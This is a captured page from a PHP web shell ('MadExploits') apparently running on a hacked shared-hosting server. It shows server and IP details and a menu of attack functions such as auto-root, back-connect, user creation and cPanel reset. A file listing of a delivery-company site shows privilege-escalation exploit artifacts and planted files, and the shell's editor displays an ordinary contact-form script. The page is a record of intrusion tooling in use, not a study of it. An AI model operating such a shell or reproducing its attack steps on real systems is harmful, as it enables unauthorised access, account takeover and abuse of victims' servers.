Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.96
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
swift-xpc.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
.htaccess
257
B
-rw-r--r--
.index.php
1.62
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
01swiftxpress.delivery.zip
36.2
MB
-rw-r--r--
about.php
3.25
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
contact.php
5.82
KB
-rw-r--r--
error_log
631.98
KB
-rw-r--r--
functions.php
2.32
KB
-rw-r--r--
good.php
7.71
KB
-rw-r--r--
google03588a098ee20279.html
53
B
-rw-r--r--
google18372def94796f27.html
53
B
-rw-r--r--
google298e9b430a229453.html
53
B
-rw-r--r--
google3b611924d8a868ba.html
53
B
-rw-r--r--
google537e082bbfe294fa.html
53
B
-rw-r--r--
google5cce3dda03c5ea79.html
53
B
-rw-r--r--
google7bf4c1896906723d.html
53
B
-rw-r--r--
googlea27f26ef3c16ef21.html
53
B
-rw-r--r--
googlec1ea6bf266124648.html
53
B
-rw-r--r--
googlecc879ae06689d91a.html
53
B
-rw-r--r--
googled67911d9ca645e70.html
53
B
-rw-r--r--
googlee800147306ef23ee.html
53
B
-rw-r--r--
googlef0055a8384a88b01.html
53
B
-rw-r--r--
index.php
7.71
KB
-r--r--r--
index3.php
51.7
KB
-rw-r--r--
infox.txt
169
B
-rw-r--r--
phpinfo.php
25
B
-rw-r--r--
privacy.php
6.64
KB
-rw-r--r--
services.php
5.5
KB
-rw-r--r--
terms.php
7.4
KB
-rw-r--r--
tracking.php
8.27
KB
-rw-r--r--
wp-site.php
9.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contact.php
<?php include("includes/header.php"); include("includes/navbar.php"); include("functions/mailer.php"); //include("includes/main_content.php"); ?> <!-- Page Breadcrumbs Start --> <div class="slider-area "> <div class="single-slider hero-overly slider-height2 d-flex align-items-center" data-background="assets/img/hero/about.jpg"> <div class="container"> <div class="row"> <div class="col-xl-12"> <div class="hero-cap"> <h2>Contact Us</h2> <nav aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="./">Home</a></li> <li class="breadcrumb-item"><a href="#">Contact Us</a></li> </ol><br /> <p style="color:#fff;">Our global network and full-service team of airfreight and expedited freight professionals are ready to help.</p> </nav> </div> </div> </div> </div> </div> </div><br /> <!-- Page Breadcrumbs End --> <!-- Main Body Content Start --> <main id="body-content"> <!-- Contact Details Start --> <section class="wide-tb-80 contact-full-shadow"> <div class="container"> <div class="contact-map-bg"> <img src="assets/images/map-bg.png" alt=""> </div> </div> </section> <!-- Contact Details End --> <!-- Contact Us From --> <section class="wide-tb-100 bg-light-gray pt-0"> <div class="container"> <div class="row"> <div class="col-md-12 col-sm-12 col-lg-8 mx-auto wow fadeInUp" data-wow-duration="0" data-wow-delay="0s"> <div class="free-quote-form contact-page"> <!-- Heading Main --> <br/> <section class="contact-area" id="contact"> <div class="contact-form-area section-padding gray-bg"> <div class="container"> <div class="row"> <div class="col-md-12 col-lg-12 col-sm-12 col-xs-12"> <div class="area-title text-center"> <h3>GET IN TOUCH</h3> <p>Need any help just send a message via our email address<br/><i class="fa fa-envelope"></i> <a href="mailto:<?php echo $webmail?>"><?php echo $webmail?></a></p> </div> </div> </div> <div class="row"> <div class="col-md-8 col-lg-8 col-sm-12 col-xs-12"> <form action="" method="post" role="form" class="contactForm"> <div class="form-group"> <input type="text" name="name" class="form-control" id="name" placeholder="Your Name" data-rule="minlen:4" data-msg="Please enter at least 4 chars" /> <div class="validation"></div> </div> <input type ="text" class="form-control" id="text" name="text" value=""> <div class="form-group"> <input type="email" class="form-control" name="email" id="email" placeholder="Your Email" data-rule="email" data-msg="Please enter a valid email" /> <div class="validation"></div> </div> <div class="form-group"> <input type="text" class="form-control" name="subject" id="subject" placeholder="Subject" data-rule="minlen:4" data-msg="Please enter at least 8 chars of subject" /> <div class="validation"></div> </div> <div class="form-group"> <textarea class="form-control" name="message" rows="5" data-rule="required" data-msg="Please write something for us" placeholder="Message"></textarea> <div class="validation"></div> </div> <br/> <div class="text-center"><button type="submit" name="submit" class="btn btn-info btn-block btn-md">Send Message</button></div> </form> </div> <div class="col-md-4 col-lg-4 col-sm-12 col-xs-12"> <div class="contact-image text-center"> <img src="img/contact-right.png" alt=""> </div> </div> </div> </div> </div> </section> <!--CONTACT US AREA END--> </div> </div> <?php if(isset($_POST['submit'])){ $message = $_POST['message']; $subject = $_POST['subject']; $email = mysql_escape_string($_POST['email']); $name = mysql_escape_string($_POST['name']); $text = $_POST['text']; if($text!=""){ die(); } $mail = new PHPMailer; $mail->From = $email; $mail->FromName = $site_name; //To address and name $mail->AddAttachment("files/".$file_name); $mail->addAddress($webmail); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = $subject; $mail->Body = $message; if(!$mail->send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "<script> alert ('You sucessfully contacted us ') </script>"; } } ?> </div> </div> </section> </main> <?php include("includes/footer.php"); ?>
Close